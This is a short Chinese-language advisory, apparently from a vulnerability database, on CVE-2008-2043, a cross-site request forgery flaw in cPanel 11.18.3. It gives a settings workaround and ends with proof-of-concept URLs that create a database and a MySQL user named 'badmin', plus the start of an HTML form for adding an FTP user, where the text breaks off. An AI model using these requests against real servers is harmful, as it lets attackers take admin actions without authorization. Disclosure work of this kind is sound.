CVE(CAN) ID: CVE-2008-2043
cPanel是基于web的工具,用于自动化控制网站和服务器。
cPanel没有验证用户通过HTTP请求所执行的某些操作,这允许远程攻击者通过跨站请求伪造(XSRF)攻击执行仅有管理员才可以执行的操作,包括创建新的数据库、添加新用户等。
cPanel 11.18.3 build ID 21703
临时解决方法:
1 导航至Server configuration
2 找到Tweak Settings
3 在WebHost Manager中找到Security
4 选择复选框并保存页面
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.cpanel.net” target=“_blank”>http://www.cpanel.net</a>
创建数据库:
http://localhost:2082/frontend/x2/sql/adddb.html?db=database_name
创建新的mysql用户:
http://localhost:2082/frontend/x2/sql/adduser.html?user=badmin&pass=badmin
添加ftp用户:
<html>
<f